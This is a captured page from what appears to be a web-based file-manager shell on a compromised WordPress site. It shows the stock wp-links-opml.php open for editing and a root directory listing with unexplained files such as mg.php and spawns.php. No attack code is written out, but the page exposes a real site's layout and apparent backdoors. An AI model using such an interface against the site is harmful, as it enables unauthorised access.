编辑:wp-links-opml.php
<?php /** * Outputs the OPML XML format for getting the links defined in the link * administration. This can be used to export links from one blog over to * another. Links aren't exported by the WordPress export, so this file handles * that. * * This file is not added by default to WordPress theme pages when outputting * feed links. It will have to be added manually for browsers and users to pick * up that this file exists. * * @package WordPress */ require_once __DIR__ . '/wp-load.php'; header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true ); $link_cat = ''; if ( ! empty( $_GET['link_cat'] ) ) { $link_cat = $_GET['link_cat']; if ( ! in_array( $link_cat, array( 'all', '0' ), true ) ) { $link_cat = absint( urldecode( $link_cat ) ); } } echo '<?xml version="1.0"?' . ">\n"; ?> <opml version="1.0"> <head> <title> <?php /* translators: %s: Site title. */ printf( __( 'Links for %s' ), esc_attr( get_bloginfo( 'name', 'display' ) ) ); ?> </title> <dateCreated><?php echo gmdate( 'D, d M Y H:i:s' ); ?> GMT</dateCreated> <?php /** * Fires in the OPML header. * * @since 3.0.0 */ do_action( 'opml_head' ); ?> </head> <body> <?php if ( empty( $link_cat ) ) { $cats = get_categories( array( 'taxonomy' => 'link_category', 'hierarchical' => 0, ) ); } else { $cats = get_categories( array( 'taxonomy' => 'link_category', 'hierarchical' => 0, 'include' => $link_cat, ) ); } foreach ( (array) $cats as $cat ) : /** This filter is documented in wp-includes/bookmark-template.php */ $catname = apply_filters( 'link_category', $cat->name ); ?> <outline type="category" title="<?php echo esc_attr( $catname ); ?>"> <?php $bookmarks = get_bookmarks( array( 'category' => $cat->term_id ) ); foreach ( (array) $bookmarks as $bookmark ) : /** * Filters the OPML outline link title text. * * @since 2.2.0 * * @param string $title The OPML outline title text. */ $title = apply_filters( 'link_title', $bookmark->link_name ); ?> <outline text="<?php echo esc_attr( $title ); ?>" type="link" xmlUrl="<?php echo esc_url( $bookmark->link_rss ); ?>" htmlUrl="<?php echo esc_url( $bookmark->link_url ); ?>" updated=" <?php if ( '0000-00-00 00:00:00' !== $bookmark->link_updated ) { echo $bookmark->link_updated; } ?> " /> <?php endforeach; // $bookmarks ?> </outline> <?php endforeach; // $cats ?> </body> </opml>
保存文件
位置:
home
/
caveqifv
/
caventekandina.com.co
批量上传
创建
创建
批量权限
批量删除
名称
权限
大小
修改时间
操作
↑ 返回上级
-
-
-
-
.tmb
drwxrwxrwx
-
2025-04-12 08:58
权限
删除
重命名
.well-known
drwxr-xr-x
-
2025-10-29 13:01
权限
删除
重命名
cgi-bin
drwxr-xr-x
-
2024-10-27 23:11
权限
删除
重命名
wp-admin
drwxr-xr-x
-
2026-04-29 08:30
权限
删除
重命名
wp-content
drwxr-xr-x
-
2026-05-06 18:49
权限
删除
重命名
wp-includes
drwxr-xr-x
-
2026-04-30 09:28
权限
删除
重命名
.hcflag
-rw-r--r--
31 B
2026-05-01 20:30
编辑
下载
权限
删除
重命名
.htaccess
-rwxr-xr-x
552 B
2026-05-04 12:26
编辑
下载
权限
删除
重命名
.htaccess.bk
-rw-r--r--
1.37 KB
2024-10-28 04:50
编辑
下载
权限
删除
重命名
.litespeed_flag
-rw-r--r--
297 B
2026-05-06 01:33
编辑
下载
权限
删除
重命名
error_log
-rw-r--r--
6.97 MB
2026-05-06 21:38
编辑
下载
权限
删除
重命名
index.zip
-rw-r--r--
5.51 KB
2026-05-01 08:24
编辑
下载
权限
删除
重命名
license.txt
-rw-r--r--
19.44 KB
2025-12-03 15:12
编辑
下载
权限
删除
重命名
mg.php
-rw-r--r--
13.62 KB
2026-04-28 03:28
编辑
下载
权限
删除
重命名
readme.html
-rw-r--r--
7.25 KB
2026-03-11 18:34
编辑
下载
权限
删除
重命名
robots.txt
-rw-r--r--
75 B
2026-05-06 10:31
编辑
下载
权限
删除
重命名
spawns.php
-rw-r--r--
184.27 KB
2026-04-28 03:27
编辑
下载
权限
删除
重命名
wp-activate.php
-rw-r--r--
7.18 KB
2025-12-03 15:12
编辑
下载
权限
删除
重命名
wp-blog-header.php
-rw-r--r--
351 B
2020-02-06 17:03
编辑
下载
权限
删除
重命名
wp-comments-post.php
-rw-r--r--
2.27 KB
2023-06-14 23:41
编辑
下载
权限
删除
重命名
wp-config-sample.php
-rw-r--r--
28.23 KB
2025-12-03 15:12
编辑
下载
权限
删除
重命名
wp-config.php
-rw-r--r--
3.23 KB
2025-03-26 01:34
编辑
下载
权限
删除
重命名
wp-links-opml.php
-rw-r--r--
2.43 KB
2025-12-03 15:12
编辑
下载
权限
删除
重命名
wp-load.php
-rw-r--r--
3.84 KB
2025-04-16 18:37
编辑
下载
权限
删除
重命名
wp-login.php
-rw-r--r--
50.23 KB
2025-12-03 15:12
编辑
下载
权限
删除
重命名
wp-settings.php
-rw-r--r--
30.33 KB
2025-12-03 15:12
编辑
下载
权限
删除
重命名
wp-trackback.php
-rw-r--r--
5.09 KB
2025-12-03 15:12
编辑
下载
权限
删除
重命名
xmlrpc.php
-rw-r--r--
3.13 KB
2025-04-16 18:37
编辑
下载
权限
删除
重命名